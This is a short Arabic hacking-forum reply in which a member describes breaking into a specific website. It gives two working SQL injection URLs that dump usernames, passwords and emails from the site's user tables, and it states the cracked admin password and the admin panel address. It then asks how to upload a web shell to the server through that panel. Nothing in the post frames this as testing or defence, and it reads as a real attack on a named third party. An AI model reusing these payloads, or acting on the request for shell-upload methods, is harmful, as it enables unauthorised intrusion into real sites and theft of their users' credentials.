عرض مشاركة واحدة
قديم 01-16-2012, 02:22 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
__MiM0__
 
الصورة الرمزية __MiM0__
 

 

 
إحصائية العضو






__MiM0__ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
__MiM0__ is on a distinguished road

افتراضي رد: مساعدة ياشباب مع أول استهداف لى


:show off:
تم تجربة حقن احد المواقع الاخرى الموجودة على السيرفر وتم استخراج اليوزر والباسورد
وتم الدخول على الادمن الخاصة بالموقع بالموقع
كود PHP:
http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users-- 
ملحوظة الباسورد بعد فك التشفيرة هو :: password
http://chiirichtown.com/admin

ويوجد جدول اخر

كود PHP:
http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(l_id,0x3a,LoginName,0x3a,Password,0x3a,Email)*/,4,5,6,7+from+tbl_login-- 
وجربت اليوزر ادمن وادمن على السى بنل ولكن لم ينفع
ممكن ياشباب حد يقولى ينفع ارفع شل على السيرفر من لوحة الادمن ام لا ؟؟ وان كانت الاجابة اه ممكن شرح او درس للطريقة
والف شكرا مقدما

   

رد مع اقتباس